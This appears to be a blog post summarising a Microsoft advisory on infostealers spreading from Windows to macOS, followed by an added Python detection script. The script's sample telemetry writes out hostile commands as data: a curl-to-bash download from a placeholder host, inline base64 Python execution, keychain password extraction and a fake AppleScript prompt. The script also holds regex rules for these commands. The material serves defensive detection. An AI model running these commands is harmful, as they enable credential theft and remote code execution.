Microsoft Warns: Python Infostealers Expand from Windows to macOS

Feb 4 · 2 min read

Key Findings

  • Microsoft warns that info-stealing attacks are "rapidly expanding" beyond Windows to target Apple macOS environments.

  • Attackers are leveraging cross-platform languages like Python and abusing trusted platforms to distribute infostealer malware at scale.


Background

  • Since late 2025, Microsoft has observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix-style prompts and malicious DMG installers.

  • These campaigns deploy macOS-specific infostealers like DigitStealer, MacSync, and Atomic macOS Stealer (AMOS) using fileless execution, native macOS utilities, and AppleScript automation.

  • The attacks harvest credentials, session data, and secrets from web browsers, keychains, and developer environments.


Python-based Infostealers

  • Attackers favor Python-based stealers because they can adapt rapidly, reuse code across campaigns, and target heterogeneous Windows and macOS environments with minimal overhead.

  • Malware like PXA Stealer, linked to Vietnamese-speaking threat actors, can harvest login credentials, financial information, and browser data.

  • Attackers have distributed PXA Stealer through phishing emails, using registry Run keys and scheduled tasks for persistence and Telegram for command-and-control.


Abuse of Trusted Platforms

  • Bad actors have been observed weaponizing popular messaging apps like WhatsApp to distribute malware like Eternidade Stealer and gain access to financial and cryptocurrency accounts.

  • Fake PDF editors like Crystal PDF are also being distributed via malvertising and SEO poisoning to deploy Windows-based stealers that harvest cookies, session data, and credential caches.


Recommendations

  • Educate users on social engineering attacks like malvertising redirect chains, fake installers, and ClickFix-style copy-paste prompts.

  • Monitor for suspicious Terminal activity and access to the iCloud Keychain, and inspect network egress for POST requests to newly registered or suspicious domains.

  • Strengthen defenses against Python and LOLBIN abuse, enable cloud-delivered protection and EDR in block mode, and apply attack surface reduction rules.
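The monitoring points above (Terminal activity, Keychain access, inline Python and pipe-to-shell abuse, POST requests to newly registered domains) written out as simple detection logic over constructed telemetry. This is an added example, not code from the post or from Microsoft's advisory; the log formats, rule names, hosts and registration dates are all assumptions, and the registration table stands in for a real WHOIS/RDAP lookup.

```python
import re
from datetime import date
# Constructed sample process telemetry (not from the advisory or a real EDR
# schema): one event per line as "timestamp|parent_process|command_line".
PROCESS_EVENTS = """\
2026-02-04T10:01:02Z|Terminal|osascript -e 'display dialog "Update required" default answer ""'
2026-02-04T10:01:03Z|Terminal|security find-generic-password -s "example-service"
2026-02-04T10:01:04Z|Terminal|python3 -c "import base64; exec(base64.b64decode('<placeholder>'))"
2026-02-04T10:01:05Z|Terminal|curl -fsSL https://cdn.example.invalid/update.sh | bash
2026-02-04T10:02:10Z|launchd|/usr/libexec/xpcproxy com.apple.Safari
"""
# One rule per behaviour the advisory names: AppleScript automation, keychain
# access via the native `security` utility, inline Python, and pipe-to-shell.
RULES = [
    ("applescript_inline", re.compile(r"\bosascript\b.*\s-e\s")),
    ("keychain_cli_access", re.compile(r"\bsecurity\b.*(find-(generic|internet)-password|dump-keychain)")),
    ("python_inline_exec", re.compile(r"\bpython3?\b.*\s-c\s")),
    ("pipe_to_shell", re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b")),
]

def detect_process_events(events: str) -> list[tuple[str, str, str]]:
    """Return (timestamp, parent, rule_name) for each event matching a rule."""
    hits = []
    for line in events.splitlines():
        ts, parent, cmd = line.split("|", 2)  # maxsplit keeps pipes in the command
        hits.extend((ts, parent, name) for name, rx in RULES if rx.search(cmd))
    return hits

# Constructed egress log ("timestamp|method|host") and a constructed domain
# registration table standing in for a WHOIS/RDAP lookup.
EGRESS_LOG = """\
2026-02-04T10:01:10Z|POST|api.example.invalid
2026-02-04T10:01:11Z|GET|cdn.example.invalid
2026-02-04T10:01:12Z|POST|updates.example.invalid
"""
REGISTERED_ON = {
    "api.example.invalid": date(2026, 1, 28),
    "cdn.example.invalid": date(2019, 5, 3),
    "updates.example.invalid": date(2024, 6, 1),
}
ANALYSIS_DATE = date(2026, 2, 4)

def flag_young_domain_posts(log: str, today: date, max_age_days: int = 30) -> list[str]:
    """Return hosts that received a POST and were registered under max_age_days ago."""
    return [
        host for _, method, host in (l.split("|", 2) for l in log.splitlines())
        if method == "POST" and host in REGISTERED_ON
        and (today - REGISTERED_ON[host]).days < max_age_days
    ]
```

Running it over the constructed samples flags the four Terminal events and leaves the launchd-spawned process alone; only the POST to the week-old domain is reported from the egress log.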


Sources

  • https://thehackernews.com/2026/02/microsoft-warns-python-infostealers.html

  • https://securityaffairs.com/187608/security/microsoft-info-stealing-malware-expands-from-windows-to-macos.html

  • https://x.com/TheCyberSecHub/status/2018966095005356318

  • https://medium.com/@costigermano/microsoft-warns-python-infostealers-are-expanding-to-macos-through-fake-ads-and-installers-eda30b224507

  • https://www.thedailystar.net/tech-startup/news/infostealers-target-macos-fake-ads-and-installers-microsoft-says-4098001

  • https://www.cypro.se/2026/02/04/microsoft-warns-python-infostealers-target-macos-via-fake-ads-and-installers/

© 2025 by Explain IT Again. Powered and secured by Wix